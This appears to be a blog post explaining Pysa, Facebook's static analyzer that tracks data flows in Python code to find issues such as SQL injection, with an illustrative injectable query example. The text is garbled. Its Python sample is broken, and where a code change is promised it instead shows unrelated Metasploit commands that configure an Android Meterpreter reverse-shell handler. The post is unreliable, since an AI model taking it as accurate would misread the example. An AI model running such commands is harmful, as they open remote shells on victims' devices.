PYSA to detect and prevent security issues in Python code

Pysa: Facebook’s open-source static analysis tool
PYSA to detect and prevent security issues in Python code

“Pysa” is an open-source static analysis tool built by Facebook. It has been built to detect and prevent security and privacy issues in the python code. Pysa is an acronym for Python Static Analyzer.

Pysa is a security-focused tool build on the top of Pyre, facebook’s type checker for python. It checks code and analyzes how data flows through it. Data flow analysis is useful because many security and privacy issues can be modeled as data flowing into a place it shouldn’t. It helps to detect a wide range of issues.

Example: — When facebook use on their python code makes use of certain internal frameworks, which is designed to prevent access or disclose on their user data based on technical privacy policies.

Pysa detects common web app security issues like SQL injection, XSS. It helps to scale application security efforts for python which is the most important codebase which powers Instagram’s servers.

Pysa on Instagram —

One of the largest repositories of Python code is the millions of lines that power Instagram’s servers. An automated analyzer like Pysa is a very important tool for maintaining quality and security in this codebase. By running on a developer’s code, it gives results in very less time than the weeks could take to review manually.

How Pysa works?

Pysa was developed with the lessons learned from Zoncolan in mind. It used the same algorithm to perform analysis and even shares some code with Zoncolan. It tracks data flows through a program. The most common kinds of sources are places where user-controlled data enters the application like Django’s HttpRequest.GET dictionary. Sinks tend to be much more varied but can include APIs that execute code suck as eval to access file systems like It performs some rounds of analysis to build summaries to determine which functions have parameters that eventually reach a sink. Visualizing this process creates a tree with the issue of apex and source and sinks at the leaves.

PYSA to detect and prevent security issues in Python code
Work technique

Positives and negatives —

According to Facebook engineers, it gives some false positive and negative and they decide how to deal with it.

  • False positives occur when a tool reports that a security issue is present where none exists.
  • False negatives occur when a tool fails to detect and report when a real security issue is present.

Here two kinds of functionality by which users can remove these false positives and negative features.

  • Sanitizers — During the analysis process, pysa to complete data flow after it passes through a function to attribute the allow users to encode their domain in specific knowledge about transformations that will always render data being from a security perspective.
  • Features — It is a little piece of metadata that can attach to flows of data as they are being tracked throughout the code. It never removes any issue from Pysa’s result.

Where Pysa is most Useful?

Imagine this code is written by a user.

# views/
async def get_profile(request: HttpRequest) -> HttpResponse:
   profile = load_profile(request.GET['user_id'])
# controller/
async def load_profile(user_id: str):
   user = load_user(user_id) # Loads a user safely; no SQL injection
   pictures = load_pictures(
# model/
async def load_pictures(user_id: str):
   query = f"""
      SELECT *
      FROM pictures
      WHERE user_id = {user_id}
   result = run_query(query)
# model/
async def run_query(query: str):
   connection = create_sql_connection()
   result = await connection.execute(query)

The potential SQL injection is load_pictures is not exploitable because that function will only ever receive the valid user_id that resulted from calling load_user in the load_profile function.

Then, think that an engineer who fetching the user and picture data concurrently results faster —

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost
set lport 4444

This change may look innocuous but ends up connecting the user-controlled user_id string directly to the SQL injection issue in load_pictures. In a large application with many layers between the entry point and database queries, this engineer might never realize that the data is fully user-controlled, or that a SQL injection issue lurks in one of the functions called.

Open-source Pysa:

Facebook makes Pysa open source to help it to find security issues. So others can use these tools for their python code. Some open-source Python frameworks such as Django and Tornedo, Pysa helps to find security issues in projects in the first run and also in record time.

Limitation —

There is no way to build a perfect static analyzer. Pysa has also some limitations based on its choice to detect security issues by data flow, together with design decisions that trade-off performance for precision and accuracy.

If you want to ask anything to the world, feel free to ask the community as a response.

Leave a Reply

Your email address will not be published.